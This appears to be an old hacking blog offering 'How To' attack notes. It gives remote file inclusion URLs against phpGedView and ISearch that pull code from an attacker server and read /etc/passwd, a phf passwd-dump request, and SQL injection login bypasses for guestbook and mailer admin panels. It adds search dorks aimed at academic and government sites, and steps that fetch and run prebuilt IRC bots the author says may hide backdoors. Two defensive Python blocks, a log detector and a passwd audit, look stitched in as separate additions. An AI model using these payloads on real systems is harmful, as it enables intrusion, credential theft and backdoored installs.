A friend gave me an old saying from China:
Sun-Tzu: "If the enemy leaves a door open, you must rush in."
Which means:
If the enemy leaves the door open, we must rush in!
That saying reminds me of some time ago, when I was first learning to build a psyBNC/bot; its performance and its complicated way of compiling drove me to look for scripts that were already compiled.
At the end of my search I found Chanarybot/ChanaryPSY (from the channel #chanary@DALnet), whose compilation was so impressive (in my opinion at the time).
After quite a long, long, long time, I finally realized that both of them had a backdoor that ran without our knowledge, logging in to our psy/bot access and doing things we could not imagine.
<fazar> Sun-Tzu: "If the enemy leaves a door open, you must rush in."
<fazar> If the enemy leaves the door open, we must rush in!
<fazar> ;)
<anak-rimba> whoa, what is that
<anak-rimba> that is called a back door, bro
It is not the fault of whoever made the backdoor if your password is stolen, because you used/obtained it for free without checking it first.
Government Warning:
- Read the usage instructions; if you do not agree with someone else's script, please EDIT it yourself, of course without removing its nota bene.
Friday, December 23, 2005
Syaloom
Posted by komenggg at 11:56 PM 0 comments
Labels: uneg uneg
How To 9
PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
Description:
PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.
External References:
Mitre CVE: CAN-2004-0128
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
Summary:
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). Multiple PHP Code Injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.
Release Date:
January 29 2004
Severity:
High
SecureScout Testcase ID:
TC 17868 (Still in Development)
Vulnerable Systems:
phpGedView version 2.65.1 and prior
Vulnerability Type:
PHP Injection - force the Target to Execute a PHP file from Attackers Server
Vendor Status:
The Vendor has been notified and has Released a Version 2.65.3 that fixes the problem
Example:
(HIGH Risk no authentication needed)
-- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
-- HTTP Request --
Code impacted: [GED_File]_conf.php
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
    require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
else {
    $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
    require($THEME_DIR."theme.php");
}
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM file used. Just perform a http://[target]/session.php request; the GEDCOM file will be in the argument of the login.php call.
The attacker has to create on his web site a directory called themes/standard, and a file theme.php
For example: theme.php =
and the request, will execute the phpinfo() command on the vulnerable target.
Credits:
Cedric Cochin - netVigilance Vulnerability Research team
Posted by komenggg at 11:54 PM 0 comments
Labels: tutor
Tuesday, December 13, 2005
Thanks To Anymous
Say: thx to Anymous, about your comment.
Your suggestion about the PoC is noted; I will try to provide a good PoC format, because this blog is not security focus/a hacking tutorial, just a note for friends who need it.
One thing to remember: I am not the one who found these bugs/exploits; I only assemble, I am not the author. Like a bomb: I cannot make RDX/C4, I only assemble.
Still, all of your suggestions will be taken on board.
Thx.
Posted by komenggg at 12:39 PM 0 comments
Friday, December 09, 2005
How To 8
'isearch.inc.php' includes the following files relative to the user-supplied $isearch_path variable:
isearch_core.inc.php
isearch_spider.inc.php
isearch_search.inc.php
A remote user can reportedly supply a specially crafted URL that will include arbitrary PHP code from a remote location and execute the code on the target system. The code, including operating system commands, will execute with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd
The author indicates that this vulnerability was reported by blackcobra-x.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution: No solution was available at the time of this entry.
Vendor URL: www.isearchthenet.com/isearch/index.php
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: taktau@taktau.cc
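Both the phpGedView advisory (PGV_BASE_DIRECTORY, THEME_DIR) and the ISearch advisory (isearch_path) describe requests in which an include-path parameter carries a remote URL, and that shape can be searched for in web server access logs. The following is an added example, not code from either advisory or from this blog; the function name, the log lines and the hosts in them are constructed assumptions, and it generalizes slightly by also reporting URL-valued parameters with other names at lower confidence.

```python
import re
from urllib.parse import parse_qsl, unquote

# Parameter names taken from the two advisories on this page.
KNOWN_INCLUDE_PARAMS = {"PGV_BASE_DIRECTORY", "THEME_DIR", "isearch_path"}
# A parameter value that starts with a remote URL scheme.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2004:10:00:01 +0000] "GET /pgv/index/demo_conf.php'
    '?PGV_BASE_DIRECTORY=http://files.example.net&THEME_DIR=/ HTTP/1.0" 200 512',
    '192.0.2.11 - - [29/Jan/2004:10:00:02 +0000] "GET /isearch/isearch.inc.php'
    '?isearch_path=http%3A%2F%2Ffiles.example.net%2F%3F HTTP/1.0" 200 90',
    '192.0.2.12 - - [29/Jan/2004:10:00:03 +0000] "GET /pgv/index.php'
    '?ged=demo.ged HTTP/1.0" 200 4096',
    '192.0.2.13 - - [29/Jan/2004:10:00:04 +0000] "GET /redirect.php'
    '?url=https://www.example.org/ HTTP/1.1" 302 0',
]


def find_remote_include_params(log_lines):
    """Return (client, parameter, decoded value, known_parameter) per hit."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        query = match.group(1).partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; unquote again to catch double encoding.
            decoded = unquote(value)
            if REMOTE_SCHEME.match(decoded):
                hits.append((client, name, decoded, name in KNOWN_INCLUDE_PARAMS))
    return hits


if __name__ == "__main__":
    for hit in find_remote_include_params(SAMPLE_LOG):
        print(hit)
```

A hit with the last field True names one of the parameters from the advisories; a hit with False (such as a redirect target) needs manual review before it is treated as an include attempt.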
Posted by komenggg at 4:16 PM 2 comments
Labels: tutor
Tuesday, December 06, 2005
Telnet Chat
Chat To IRC :
But No mIRC, No BitchX, No XChat
Use Telnet
set localecho
irc.telkom.net.id 6667
USER Idnet localhost localhost :Real
NICK nick
JOIN #kecoak
PART #
PRIVMSG #
PRIVMSG
QUIT :
Why Telnet? Because you can get it on 99.9% of operating systems, so use this only in an emergency situation!
Posted by komenggg at 11:16 AM 0 comments
Monday, December 05, 2005
How To 4
altavista Dorks :
host:ac.il
http://[target]/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
Encrypted passwd:
root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh
passwd without encryption/no shadow:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh
A cracker program works more or less like this:
1. read word #1 from the dictionary/wordlist file
2. encrypt it with the DES algorithm
3. read line 1 of the passwd file (account 1), read the account name and the encrypted passwd
4. compare whether encrypted word #1 = encrypted passwd 1
5. Yes? Notify the user/record it in the log. No? Read line 2 of the passwd file, then.
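The comparison in step 4 is only possible when the passwd file itself carries the hash, which is the difference between the shadowed and "no shadow" entries shown above. The following is an added example, not from the original post: an audit that classifies the password field of each passwd line and reports accounts whose hash is exposed or whose password is empty. The function names and the sample entries are constructed assumptions.

```python
import re

# Traditional DES crypt(3) value: 2 salt characters + 11 hash characters.
DES_CRYPT = re.compile(r"[./0-9A-Za-z]{13}")
# Modular crypt format: $id$... (for example $1$ for MD5, $6$ for SHA-512).
MODULAR_CRYPT = re.compile(r"\$[0-9a-z]+\$.+")

# Constructed sample entries; the hash values are placeholders, not real hashes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/:/bin/false
alice:abCONSTRUCTED:1001:100:Constructed User:/home/alice:/bin/sh
bob::1002:100:No Password:/home/bob:/bin/sh
carol:$6$salt$CONSTRUCTEDHASH:1003:100:Carol:/home/carol:/bin/sh
"""


def classify_field(pw):
    """Classify the second field of a passwd entry."""
    if pw == "x":
        return "shadowed"        # hash lives in the root-only shadow file
    if pw == "":
        return "empty"           # account has no password at all
    body = pw.lstrip("!")        # a leading "!" locks the account but keeps the hash
    if pw.startswith("*") or body == "":
        return "locked"
    if DES_CRYPT.fullmatch(body):
        return "des-crypt-exposed"
    if MODULAR_CRYPT.fullmatch(body):
        return "hash-exposed"
    return "unknown"


def audit_passwd(text):
    """Return (line number, account, status) for entries that need attention."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            findings.append((lineno, "?", "malformed"))
            continue
        status = classify_field(parts[1])
        if status not in ("shadowed", "locked"):
            findings.append((lineno, parts[0], status))
    return findings
```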
Another Link
ac.jp (Japanese academic)
ac.kr (Korean academic)
.edu (US academic)
ac.uk (UK academic)
go.kr (Korean government)
go.in (Indian government)
ac.ir (Iranian academic)
com.il (Israeli commercial), etc.
Posted by komenggg at 5:10 PM 0 comments
Labels: tutor
BOT Precompile
http://h1.ripway.com/xgoogle/zregbot.tar.tar
tar
rm zregbot.tar.tar
cd
cd scripts
http://home.ripway.com/2005-2/261717/buhamtcl.txt
mv ary.tcl
./nadya PID nickbot ident ip channel owner
Posted by komenggg at 4:51 PM 0 comments
How To 5
Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.
Target :
http://www.example.com/[GuestbookTarget]/admin.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
It works on Advanced Guestbook 2.2; version 2.3.1 will fix this vulnerability.
Posted by komenggg at 1:58 PM 0 comments
Labels: tutor
PsyBNC Precompile
http://channels.dal.net/bodi/irc/prepsybnc.tar.gz
tar
rm prepsybnc.tar.gz
mv psybnc
cd
rm scripts/DEFAULT.SCRIPT
ps
./kik "process" ./psybnc
/sbin/ifconfig | grep inet
cat /etc/hosts
ls -FRla | grep drwxrwxrwx
Posted by komenggg at 1:51 PM 0 comments
How To 2
1-2-All Broadcast E-mail Software ( POC )
Supplying the following is sufficient to gain access to the admin control panel:
Target :
http://www.example.com/[12allTarget]/admin/index.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
Posted by komenggg at 1:18 PM 0 comments
Labels: tutor
... because A BLOG IS ALSO A COPYRIGHTED WORK. Make a habit of asking the owner of a work for permission, or at least citing the original source. Consider it a way of keeping in touch and widening your social circle, right?
All elements of this blog, including images, photos, writing and others, are under the Creative Commons License, unless stated otherwise.